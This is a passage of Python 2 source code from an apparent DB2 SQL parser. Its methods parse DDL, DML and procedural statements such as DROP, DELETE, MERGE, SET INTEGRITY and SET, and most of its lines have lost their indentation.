self._expect_sequence(['WORK', 'ACTION', TT.IDENTIFIER, 'ON', 'WORK', 'CLASS', TT.IDENTIFIER])
self._parse_action_types_clause()
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
if self._match(','):
self._newline()
else:
break
self._outdent()
self._expect(')')
self._match_one_of(['ENABLE', 'DISABLE'])
def _parse_create_work_class_set_statement(self):
"""Parses a CREATE WORK CLASS SET statement"""
# CREATE WORK CLASS SET already matched
self._expect(TT.IDENTIFIER)
if self._match('('):
self._indent()
while True:
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
self._parse_work_attributes()
if self._match('POSITION'):
self._parse_position_clause()
if self._match(','):
self._newline()
else:
break
self._outdent()
self._expect(')')
def _parse_create_workload_statement(self):
"""Parses a CREATE WORKLOAD statement"""
        # CREATE WORKLOAD already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
# Repeatedly try and match connection attributes. Only raise a
# parse error if the first match fails
try:
self._parse_connection_attributes()
            except ParseError, e:
                if first:
                    raise e
                break
            else:
                first = False
self._match_one_of(['ENABLE', 'DISABLE'])
if self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect_sequence(['DB', 'ACCESS'])
if self._match_sequence(['SERVICE', 'CLASS']):
if not self._match('SYSDEFAULTUSERCLASS'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['UNDER', TT.IDENTIFIER])
if self._match('POSITION'):
self._parse_position_clause()
if self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
def _parse_create_wrapper_statement(self):
"""Parses a CREATE WRAPPER statement"""
# CREATE WRAPPER already matched
self._expect(TT.IDENTIFIER)
if self._match('LIBRARY'):
self._expect(TT.STRING)
if self._match('OPTIONS'):
self._parse_federated_options(alter=False)
def _parse_declare_cursor_statement(self):
"""Parses a top-level DECLARE CURSOR statement"""
# DECLARE already matched
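        # e.g. DECLARE c1 CURSOR WITH HOLD FOR SELECT * FROM t1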
self._expect_sequence([TT.IDENTIFIER, 'CURSOR'])
self._match_sequence(['WITH', 'HOLD'])
self._expect('FOR')
self._newline()
self._parse_select_statement()
def _parse_declare_global_temporary_table_statement(self):
"""Parses a DECLARE GLOBAL TEMPORARY TABLE statement"""
# DECLARE GLOBAL TEMPORARY TABLE already matched
self._parse_table_name()
if self._match('LIKE'):
self._parse_table_name()
self._parse_copy_options()
elif self._match('AS'):
self._parse_full_select()
self._expect_sequence(['DEFINITION', 'ONLY'])
self._parse_copy_options()
else:
self._parse_table_definition(aligntypes=True, alignoptions=False, federated=False)
valid = set(['ON', 'NOT', 'WITH', 'IN', 'PARTITIONING'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'ON':
self._expect('COMMIT')
self._expect_one_of(['DELETE', 'PRESERVE'])
self._expect('ROWS')
elif t == 'NOT':
self._expect('LOGGED')
if self._match('ON'):
self._expect('ROLLBACK')
self._expect_one_of(['DELETE', 'PRESERVE'])
self._expect('ROWS')
elif t == 'WITH':
self._expect('REPLACE')
elif t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'PARTITIONING':
self._expect('KEY')
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match_sequence(['USING', 'HASHING'])
def _parse_delete_statement(self):
"""Parses a DELETE statement"""
# DELETE already matched
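        # e.g. DELETE FROM t1 AS t WHERE t.c1 = 0 WITH RR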
self._expect('FROM')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
# Ambiguity: INCLUDE is an identifier and hence can look like a table
# correlation name
reraise = False
self._save_state()
try:
# Try and parse a mandatory table correlation followed by a
# mandatory INCLUDE
self._parse_table_correlation(optional=False)
self._newline()
self._expect('INCLUDE')
reraise = True
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
# XXX Is SET required for an assignment clause? The syntax diagram
# doesn't think so...
if self._match('SET'):
self._parse_assignment_clause(allowdefault=False)
except ParseError:
# If that fails, rewind and parse an optional INCLUDE or an
# optional table correlation
self._restore_state()
if reraise: raise
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('SET'):
self._newline(-1)
self._parse_assignment_clause(allowdefault=False)
else:
self._parse_table_correlation()
else:
self._forget_state()
if self._match('WHERE'):
self._newline(-1)
self._indent()
self._parse_search_condition()
self._outdent()
if self._match('WITH'):
self._newline(-1)
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_drop_statement(self):
"""Parses a DROP statement"""
# DROP already matched
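        # e.g. DROP TABLE foo.bar RESTRICT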
if self._match_one_of(['ALIAS', 'SYNONYM', 'TABLE', 'VIEW', 'NICKNAME', 'VARIABLE']):
self._parse_subschema_name()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_function_name()
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('INDEX'):
self._parse_index_name()
elif self._match('SEQUENCE'):
self._parse_sequence_name()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._expect(TT.IDENTIFIER)
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['TABLESPACE', 'TABLESPACES']):
self._parse_ident_list()
elif self._match_one_of(['DATA', 'DISTINCT']):
self._expect('TYPE')
self._parse_type_name()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_type_name()
elif self._match('TYPE'):
self._parse_type_name()
elif self._match_sequence(['USER', 'MAPPING']):
self._expect('FOR')
self._expect_one_of(['USER', TT.IDENTIFIER])
self._expect_sequence(['SERVER', TT.IDENTIFIER])
elif (self._match_sequence(['AUDIT', 'POLICY']) or
self._match('BUFFERPOOL') or
self._match_sequence(['EVENT', 'MONITOR']) or
              self._match_sequence(['HISTOGRAM', 'TEMPLATE']) or
self._match('NODEGROUP') or
self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']) or
self._match('ROLE') or
self._match('SCHEMA') or
self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']) or
self._match_sequence(['SECURITY', 'LABEL']) or
self._match_sequence(['SECURITY', 'POLICY']) or
self._match('SERVER') or
self._match('THRESHOLD') or
self._match('TRIGGER') or
self._match_sequence(['TRUSTED', 'CONTEXT']) or
self._match_sequence(['WORK', 'ACTION', 'SET']) or
self._match_sequence(['WORK', 'CLASS', 'SET']) or
self._match('WORKLOAD') or
self._match('WRAPPER')):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'BUFFERPOOL',
'DATA',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'HISTOGRAM',
'INDEX',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'ROLE',
'SCHEMA',
'SECURITY',
'SEQUENCE',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'USER',
'VARIABLE',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
# XXX Strictly speaking, this isn't DB2 syntax - it's generic SQL. But
# if we stick to strict DB2 semantics, this routine becomes boringly
# long...
self._match_one_of(['RESTRICT', 'CASCADE'])
def _parse_execute_immediate_statement(self):
"""Parses an EXECUTE IMMEDIATE statement in a procedure"""
# EXECUTE IMMEDIATE already matched
self._parse_expression()
def _parse_execute_statement(self):
"""Parses an EXECUTE statement in a procedure"""
# EXECUTE already matched
self._expect(TT.IDENTIFIER)
if self._match('INTO'):
while True:
self._parse_subrelation_name()
if self._match('['):
self._parse_expression()
self._expect(']')
if self._match('.'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
if self._match('USING'):
self._parse_expression_list()
def _parse_explain_statement(self):
"""Parses an EXPLAIN statement"""
# EXPLAIN already matched
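        # e.g. EXPLAIN PLAN SELECTION WITH SNAPSHOT FOR SELECT * FROM t1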
if self._match('PLAN'):
self._match('SELECTION')
else:
self._expect_one_of(['PLAN', 'ALL'])
if self._match_one_of(['FOR', 'WITH']):
self._expect('SNAPSHOT')
self._match_sequence(['WITH', 'REOPT', 'ONCE'])
self._match_sequence(['SET', 'QUERYNO', '=', TT.NUMBER])
        self._match_sequence(['SET', 'QUERYTAG', '=', TT.STRING])
self._expect('FOR')
if self._match('DELETE'):
self._parse_delete_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match_sequence(['REFRESH', 'TABLE']):
self._parse_refresh_table_statement()
elif self._match_sequence(['SET', 'INTEGRITY']):
self._parse_set_integrity_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement()
def _parse_fetch_statement(self):
"""Parses a FETCH FROM statement in a procedure"""
# FETCH already matched
self._match('FROM')
self._expect(TT.IDENTIFIER)
if self._match('INTO'):
self._parse_ident_list()
elif self._match('USING'):
self._expect('DESCRIPTOR')
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of(['INTO', 'USING'])
def _parse_flush_optimization_profile_cache_statement(self):
"""Parses a FLUSH OPTIMIZATION PROFILE CACHE statement"""
# FLUSH OPTIMIZATION PROFILE CACHE already matched
if not self._match('ALL'):
self._parse_subschema_name()
def _parse_for_statement(self, label=None):
"""Parses a FOR-loop in a dynamic compound statement"""
# FOR already matched
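        # e.g. FOR r AS SELECT c1 FROM t1 DO ... END FOR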
self._expect_sequence([TT.IDENTIFIER, 'AS'])
reraise = False
self._indent()
# Ambiguity: IDENTIFIER vs. select-statement
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._match_one_of(['ASENSITIVE', 'INSENSITIVE'])
self._expect('CURSOR')
reraise = True
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('HOLD')
self._expect('FOR')
except ParseError:
self._restore_state()
if reraise: raise
else:
self._forget_state()
self._parse_select_statement()
self._outdent()
self._expect('DO')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
if self._match('END'):
break
self._outdent(-1)
self._expect('FOR')
if label:
self._match((TT.IDENTIFIER, label))
def _parse_free_locator_statement(self):
"""Parses a FREE LOCATOR statement"""
# FREE LOCATOR already matched
self._parse_ident_list()
def _parse_get_diagnostics_statement(self):
"""Parses a GET DIAGNOSTICS statement in a dynamic compound statement"""
# GET DIAGNOSTICS already matched
if self._match('EXCEPTION'):
self._expect((TT.NUMBER, 1))
while True:
self._expect_sequence([TT.IDENTIFIER, '='])
self._expect_one_of(['MESSAGE_TEXT', 'DB2_TOKEN_STRING'])
if not self._match(','):
break
else:
self._expect_sequence([TT.IDENTIFIER, '='])
            self._expect_one_of(['ROW_COUNT', 'DB2_RETURN_STATUS'])
def _parse_goto_statement(self):
"""Parses a GOTO statement in a procedure"""
# GOTO already matched
self._expect(TT.IDENTIFIER)
def _parse_grant_statement(self):
"""Parses a GRANT statement"""
# GRANT already matched
self._parse_grant_revoke(grant=True)
def _parse_if_statement(self):
"""Parses an IF-conditional in a dynamic compound statement"""
# IF already matched
t = 'IF'
while True:
if t in ('IF', 'ELSEIF'):
self._parse_search_condition(newlines=False)
self._expect('THEN')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
t = self._match_one_of(['ELSEIF', 'ELSE', 'END'])
if t:
self._outdent(-1)
t = t.value
break
else:
self._newline()
elif t == 'ELSE':
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
break
else:
break
self._expect('IF')
def _parse_insert_statement(self):
"""Parses an INSERT statement"""
# INSERT already matched
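        # e.g. INSERT INTO t1 (c1, c2) VALUES (1, DEFAULT)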
self._expect('INTO')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
if self._match('('):
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
# Parse a full-select with optional common-table-expression, allowing
# the DEFAULT keyword in (for example) a VALUES clause
self._newline()
self._parse_query(allowdefault=True)
if self._match('WITH'):
self._newline(-1)
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_iterate_statement(self):
"""Parses an ITERATE statement within a loop"""
# ITERATE already matched
self._match(TT.IDENTIFIER)
def _parse_leave_statement(self):
"""Parses a LEAVE statement within a loop"""
# LEAVE already matched
self._match(TT.IDENTIFIER)
def _parse_lock_table_statement(self):
"""Parses a LOCK TABLE statement"""
# LOCK TABLE already matched
self._parse_table_name()
self._expect('IN')
self._expect_one_of(['SHARE', 'EXCLUSIVE'])
self._expect('MODE')
def _parse_loop_statement(self, label=None):
"""Parses a LOOP-loop in a procedure"""
# LOOP already matched
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._expect('LOOP')
if label:
self._match((TT.IDENTIFIER, label))
def _parse_merge_statement(self):
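        """Parses a MERGE statement"""
        # Illustrative example of the syntax handled here:
        #   MERGE INTO t1 AS tgt USING t2 AS src ON tgt.id = src.id
        #   WHEN MATCHED THEN UPDATE SET c1 = src.c1
        #   WHEN NOT MATCHED THEN INSERT (id, c1) VALUES (src.id, src.c1)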
# MERGE already matched
self._expect('INTO')
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
self._parse_table_correlation()
self._expect('USING')
self._parse_table_ref()
self._expect('ON')
self._parse_search_condition()
self._expect('WHEN')
while True:
self._match('NOT')
self._expect('MATCHED')
if self._match('AND'):
self._parse_search_condition()
self._expect('THEN')
self._indent()
if self._match('UPDATE'):
self._expect('SET')
self._parse_assignment_clause(allowdefault=True)
elif self._match('INSERT'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
self._expect('VALUES')
if self._match('('):
self._parse_expression_list(allowdefault=True)
self._expect(')')
else:
if not self._match('DEFAULT'):
self._parse_expression()
if not self._match(','):
break
elif self._match('DELETE'):
pass
elif self._match('SIGNAL'):
                self._parse_signal_statement()
self._outdent()
if not self._match('WHEN'):
break
self._match_sequence(['ELSE', 'IGNORE'])
def _parse_open_statement(self):
"""Parses an OPEN cursor statement"""
# OPEN already matched
self._expect(TT.IDENTIFIER)
if self._match('('):
if not self._match(')'):
self._parse_expression_list()
self._expect(')')
if self._match('USING'):
self._parse_expression_list()
def _parse_prepare_statement(self):
"""Parses a PREPARE statement"""
# PREPARE already matched
self._expect(TT.IDENTIFIER)
if self._match('OUTPUT'):
self._expect('INTO')
self._expect(TT.IDENTIFIER)
elif self._match('INTO'):
self._expect(TT.IDENTIFIER)
if self._match('INPUT'):
self._expect('INTO')
self._expect(TT.IDENTIFIER)
self._expect('FROM')
self._parse_expression()
def _parse_refresh_table_statement(self):
"""Parses a REFRESH TABLE statement"""
# REFRESH TABLE already matched
while True:
self._parse_table_name()
queryopt = False
if self._match('ALLOW'):
if self._match_one_of(['NO', 'READ', 'WRITE']):
self._expect('ACCESS')
elif self._match_sequence(['QUERY', 'OPTIMIZATION']):
queryopt = True
self._expect_sequence(['USING', 'REFRESH', 'DEFERRED', 'TABLES'])
self._match_sequence(['WITH', 'REFRESH', 'AGE', 'ANY'])
else:
self._expected_one_of(['NO', 'READ', 'WRITE', 'QUERY'])
if not queryopt:
if self._match_sequence(['USING', 'REFRESH', 'DEFERRED', 'TABLES']):
self._match_sequence(['WITH', 'REFRESH', 'AGE', 'ANY'])
if not self._match(','):
break
        if self._match('NOT'):
            self._expect('INCREMENTAL')
        else:
            self._match('INCREMENTAL')
def _parse_release_savepoint_statement(self):
"""Parses a RELEASE SAVEPOINT statement"""
# RELEASE [TO] SAVEPOINT already matched
self._expect(TT.IDENTIFIER)
def _parse_rename_tablespace_statement(self):
"""Parses a RENAME TABLESPACE statement"""
# RENAME TABLESPACE already matched
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.IDENTIFIER])
def _parse_rename_statement(self):
"""Parses a RENAME statement"""
# RENAME already matched
if self._match('INDEX'):
self._parse_index_name()
else:
self._match('TABLE')
self._parse_table_name()
self._expect_sequence(['TO', TT.IDENTIFIER])
def _parse_repeat_statement(self, label=None):
"""Parses a REPEAT-loop in a procedure"""
# REPEAT already matched
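        # e.g. REPEAT SET i = i + 1; UNTIL i > 10 END REPEAT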
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
if self._match('UNTIL'):
break
else:
self._newline()
self._outdent(-1)
self._parse_search_condition()
self._expect_sequence(['END', 'REPEAT'])
if label:
self._match((TT.IDENTIFIER, label))
def _parse_resignal_statement(self):
"""Parses a RESIGNAL statement in a dynamic compound statement"""
# SIGNAL already matched
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
else:
if not self._match(TT.IDENTIFIER):
return
if self._match('SET'):
self._expect_sequence(['MESSAGE_TEXT', '='])
self._parse_expression()
def _parse_return_statement(self):
"""Parses a RETURN statement in a compound statement"""
# RETURN already matched
self._save_state()
try:
# Try and parse a select-statement
self._parse_query()
except ParseError:
# If it fails, rewind and try an expression or tuple instead
self._restore_state()
self._save_state()
try:
self._parse_expression()
except ParseError:
self._restore_state()
# If parsing an expression fails, assume it's a parameter-less
# RETURN (as can be used in a procedure)
else:
self._forget_state()
else:
self._forget_state()
def _parse_revoke_statement(self):
"""Parses a REVOKE statement"""
# REVOKE already matched
self._parse_grant_revoke(grant=False)
def _parse_rollback_statement(self):
"""Parses a ROLLBACK statement"""
# ROLLBACK already matched
self._match('WORK')
if self._match('TO'):
self._expect('SAVEPOINT')
self._match(TT.IDENTIFIER)
def _parse_savepoint_statement(self):
"""Parses a SAVEPOINT statement"""
# SAVEPOINT already matched
self._expect(TT.IDENTIFIER)
self._match('UNIQUE')
self._expect_sequence(['ON', 'ROLLBACK', 'RETAIN', 'CURSORS'])
self._match_sequence(['ON', 'ROLLBACK', 'RETAIN', 'LOCKS'])
def _parse_select_statement(self, allowinto=False):
"""Parses a SELECT statement"""
# A top-level select-statement never permits DEFAULTS, although it
# might permit INTO in a procedure
self._parse_query(allowdefault=False, allowinto=allowinto)
# Parse optional SELECT attributes (FOR UPDATE, WITH isolation, etc.)
valid = ['WITH', 'FOR', 'OPTIMIZE']
while valid:
t = self._match_one_of(valid)
if t:
self._newline(-1)
t = t.value
valid.remove(t)
else:
break
if t == 'FOR':
if self._match_one_of(['READ', 'FETCH']):
self._expect('ONLY')
elif self._match('UPDATE'):
if self._match('OF'):
self._parse_ident_list()
else:
self._expected_one_of(['READ', 'FETCH', 'UPDATE'])
elif t == 'OPTIMIZE':
self._expect_sequence(['FOR', TT.NUMBER])
self._expect_one_of(['ROW', 'ROWS'])
elif t == 'WITH':
if self._expect_one_of(['RR', 'RS', 'CS', 'UR']).value in ('RR', 'RS'):
if self._match('USE'):
self._expect_sequence(['AND', 'KEEP'])
self._expect_one_of(['SHARE', 'EXCLUSIVE', 'UPDATE'])
self._expect('LOCKS')
def _parse_set_integrity_statement(self):
"""Parses a SET INTEGRITY statement"""
def parse_access_mode():
if self._match_one_of(['NO', 'READ']):
self._expect('ACCESS')
def parse_cascade_clause():
if self._match('CASCADE'):
if self._expect_one_of(['DEFERRED', 'IMMEDIATE']).value == 'IMMEDIATE':
if self._match('TO'):
if self._match('ALL'):
self._expect('TABLES')
else:
while True:
if self._match('MATERIALIZED'):
self._expect_sequence(['QUERY', 'TABLES'])
elif self._match('FOREIGN'):
self._expect_sequence(['KEY', 'TABLES'])
elif self._match('STAGING'):
self._expect('TABLES')
else:
self._expected_one_of(['MATERIALIZED', 'STAGING', 'FOREIGN'])
if not self._match(','):
break
def parse_check_options():
valid = [
'INCREMENTAL',
'NOT',
'FORCE',
'PRUNE',
'FULL',
'FOR',
]
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if t == 'INCREMENTAL':
valid.remove('NOT')
                elif t == 'NOT':
self._expect('INCREMENTAL')
valid.remove('INCREMENTAL')
elif t == 'FORCE':
self._expect('GENERATED')
elif t == 'PRUNE':
pass
elif t == 'FULL':
self._expect('ACCESS')
elif t == 'FOR':
self._expect('EXCEPTION')
while True:
self._expect('IN')
self._parse_table_name()
self._expect('USE')
self._parse_table_name()
if not self._match(','):
break
def parse_integrity_options():
if not self._match('ALL'):
while True:
if self._match('FOREIGN'):
self._expect('KEY')
elif self._match('CHECK'):
pass
elif self._match('DATALINK'):
self._expect_sequence(['RECONCILE', 'PENDING'])
elif self._match('MATERIALIZED'):
self._expect('QUERY')
elif self._match('GENERATED'):
self._expect('COLUMN')
elif self._match('STAGING'):
pass
else:
self._expected_one_of([
'FOREIGN',
'CHECK',
'DATALINK',
'MATERIALIZED',
'GENERATED',
'STAGING',
])
if not self._match(','):
break
# SET INTEGRITY already matched
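        # e.g. SET INTEGRITY FOR t1 IMMEDIATE CHECKED
        # or   SET INTEGRITY FOR t1 OFF NO ACCESS CASCADE DEFERRED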
self._expect('FOR')
# Ambiguity: SET INTEGRITY ... CHECKED and SET INTEGRITY ... UNCHECKED
# have very different syntaxes, but only after initial similarities.
reraise = False
self._save_state()
try:
# Try and parse SET INTEGRITY ... IMMEDIATE CHECKED
while True:
self._parse_table_name()
if self._match(','):
reraise = True
else:
break
if self._match('OFF'):
reraise = True
parse_access_mode()
parse_cascade_clause()
elif self._match('TO'):
reraise = True
self._expect_sequence(['DATALINK', 'RECONCILE', 'PENDING'])
elif self._match('IMMEDIATE'):
reraise = True
self._expect('CHECKED')
parse_check_options()
elif self._match('FULL'):
reraise = True
self._expect('ACCESS')
elif self._match('PRUNE'):
reraise = True
else:
self._expected_one_of(['OFF', 'TO', 'IMMEDIATE', 'FULL', 'PRUNE'])
except ParseError:
# If that fails, parse SET INTEGRITY ... IMMEDIATE UNCHECKED
self._restore_state()
if reraise: raise
while True:
self._parse_table_name()
parse_integrity_options()
if self._match('FULL'):
self._expect('ACCESS')
if not self._match(','):
break
else:
self._forget_state()
def _parse_set_isolation_statement(self):
"""Parses a SET ISOLATION statement"""
# SET [CURRENT] ISOLATION already matched
self._match('=')
self._expect_one_of(['UR', 'CS', 'RR', 'RS', 'RESET'])
def _parse_set_lock_timeout_statement(self):
"""Parses a SET LOCK TIMEOUT statement"""
# SET [CURRENT] LOCK TIMEOUT already matched
self._match('=')
if self._match('WAIT'):
self._match(TT.NUMBER)
elif self._match('NOT'):
self._expect('WAIT')
elif self._match('NULL'):
pass
elif self._match(TT.NUMBER):
pass
else:
self._expected_one_of(['WAIT', 'NOT', 'NULL', TT.NUMBER])
def _parse_set_path_statement(self):
"""Parses a SET PATH statement"""
# SET [CURRENT] PATH already matched
self._match('=')
while True:
if self._match_sequence([(TT.REGISTER, 'SYSTEM'), (TT.REGISTER, 'PATH')]):
pass
elif self._match((TT.REGISTER, 'USER')):
pass
elif self._match((TT.REGISTER, 'CURRENT')):
self._match((TT.REGISTER, 'PACKAGE'))
self._expect((TT.REGISTER, 'PATH'))
elif self._match((TT.REGISTER, 'CURRENT_PATH')):
pass
else:
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
if not self._match(','):
break
def _parse_set_schema_statement(self):
"""Parses a SET SCHEMA statement"""
# SET [CURRENT] SCHEMA already matched
self._match('=')
t = self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'CURRENT_USER'),
TT.IDENTIFIER,
TT.STRING,
])
if t.type in (TT.IDENTIFIER, TT.STRING):
self.current_schema = t.value
def _parse_set_session_auth_statement(self):
"""Parses a SET SESSION AUTHORIZATION statement"""
# SET SESSION AUTHORIZATION already matched
self._match('=')
self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'CURRENT_USER'),
TT.IDENTIFIER,
TT.STRING,
])
self._match_sequence(['ALLOW', 'ADMINISTRATION'])
def _parse_set_statement(self):
"""Parses a SET statement in a dynamic compound statement"""
# SET already matched
if self._match('CURRENT'):
if self._match_sequence(['DECFLOAT', 'ROUNDING', 'MODE']):
self._match('=')
self._expect_one_of([
'ROUND_CEILING',
'ROUND_FLOOR',
'ROUND_DOWN',
'ROUND_HALF_EVEN',
'ROUND_HALF_UP',
TT.STRING,
])
            elif self._match('DEGREE'):
self._match('=')
self._expect(TT.STRING)
elif self._match('EXPLAIN'):
if self._match('MODE'):
self._match('=')
if self._match_one_of(['EVALUATE', 'RECOMMEND']):
self._expect_one_of(['INDEXES', 'PARTITIONINGS'])
elif self._match_one_of(['NO', 'YES', 'REOPT', 'EXPLAIN']):
pass
else:
self._expected_one_of([
'NO',
'YES',
'REOPT',
'EXPLAIN',
'EVALUATE',
'RECOMMEND',
])
elif self._match('SNAPSHOT'):
self._expect_one_of(['NO', 'YES', 'EXPLAIN', 'REOPT'])
else:
self._expected_one_of(['MODE', 'SNAPSHOT'])
elif self._match_sequence(['FEDERATED', 'ASYNCHRONY']):
self._match('=')
self._expect_one_of(['ANY', TT.NUMBER])
elif self._match_sequence(['IMPLICIT', 'XMLPARSE', 'OPTION']):
self._match('=')
self._expect(TT.STRING)
elif self._match('ISOLATION'):
self._parse_set_isolation_statement()
elif self._match_sequence(['LOCK', 'TIMEOUT']):
self._parse_set_lock_timeout_statement()
elif self._match('MAINTAINED'):
self._match('TABLE')
self._expect('TYPES')
self._match_sequence(['FOR', 'OPTIMIZATION'])
self._match('=')
while True:
if self._match_one_of(['ALL', 'NONE']):
break
elif self._match_one_of(['FEDERATED_TOOL', 'USER', 'SYSTEM']):
pass
elif self._match('CURRENT'):
self._expect('MAINTAINED')
self._match('TABLE')
self._expect('TYPES')
self._match_sequence(['FOR', 'OPTIMIZATION'])
if not self._match(','):
break
elif self._match_sequence(['MDC', 'ROLLOUT', 'MODE']):
                self._expect_one_of(['NONE', 'IMMEDIATE', 'DEFERRED'])
elif self._match_sequence(['OPTIMIZATION', 'PROFILE']):
self._match('=')
if not self._match(TT.STRING) and not self._match('NULL'):
self._parse_subschema_name()
elif self._match_sequence(['QUERY', 'OPTIMIZATION']):
self._match('=')
self._expect(TT.NUMBER)
elif self._match_sequence(['REFRESH', 'AGE']):
self._match('=')
self._expect_one_of(['ANY', TT.NUMBER])
elif self._match('PATH'):
self._parse_set_path_statement()
elif self._match('SCHEMA'):
self._parse_set_schema_statement()
else:
self._expected_one_of([
                    'DECFLOAT',
                    'DEGREE',
                    'EXPLAIN',
                    'FEDERATED',
                    'IMPLICIT',
                    'ISOLATION',
                    'LOCK',
                    'MAINTAINED',
                    'MDC',
                    'OPTIMIZATION',
                    'PATH',
                    'QUERY',
                    'REFRESH',
                    'SCHEMA',
])
elif self._match_sequence(['COMPILATION', 'ENVIRONMENT']):
self._match('=')
self._expect(TT.IDENTIFIER)
elif self._match('ISOLATION'):
self._parse_set_isolation_statement()
elif self._match_sequence(['LOCK', 'TIMEOUT']):
self._parse_set_lock_timeout_statement()
elif self._match_sequence(['ENCRYPTION', 'PASSWORD']):
self._match('=')
self._expect(TT.STRING)
elif self._match_sequence(['EVENT', 'MONITOR']):
self._expect(TT.IDENTIFIER)
self._expect('STATE')
self._match('=')
self._expect(TT.NUMBER)
elif self._match('PASSTHRU'):
self._expect_one_of(['RESET', TT.IDENTIFIER])
elif self._match('PATH'):
self._parse_set_path_statement()
elif self._match('ROLE'):
self._match('=')
self._expect(TT.IDENTIFIER)
elif self._match('CURRENT_PATH'):
self._parse_set_path_statement()
elif self._match('SCHEMA'):
self._parse_set_schema_statement()
elif self._match_sequence(['SERVER', 'OPTION']):
self._expect_sequence([TT.IDENTIFIER, 'TO', TT.STRING, 'FOR', 'SERVER', TT.IDENTIFIER])
elif self._match_sequence(['SESSION', 'AUTHORIZATION']):
self._parse_set_session_auth_statement()
elif self._match('SESSION_USER'):
self._parse_set_session_auth_statement()
else:
self._parse_assignment_clause(allowdefault=True)
def _parse_signal_statement(self):
"""Parses a SIGNAL statement in a dynamic compound statement"""
# SIGNAL already matched
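        # e.g. SIGNAL SQLSTATE '75001' SET MESSAGE_TEXT = 'Invalid input'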
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect_one_of([TT.IDENTIFIER, TT.STRING])
else:
self._expect(TT.IDENTIFIER)
if self._match('SET'):
self._expect_sequence(['MESSAGE_TEXT', '='])
self._parse_expression()
elif self._match('('):
# XXX Ensure syntax only valid within a trigger
self._parse_expression()
self._expect(')')
def _parse_transfer_ownership_statement(self):
"""Parses a TRANSFER OWNERSHIP statement"""
# TRANSFER OWNERSHIP already matched
self._expect('OF')
if self._match_one_of(['ALIAS', 'TABLE', 'VIEW', 'NICKNAME', 'VARIABLE']):
self._parse_subschema_name()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_function_name()
elif self._match_one_of(['FUNCTION', 'PROCEDURE']):
self._parse_routine_name()
if self._match('('):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
elif self._match('INDEX'):
self._parse_index_name()
elif self._match('SEQUENCE'):
self._parse_sequence_name()
elif self._match('DISTINCT'):
self._expect('TYPE')
self._parse_type_name()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_type_name()
elif self._match('TYPE'):
self._parse_type_name()
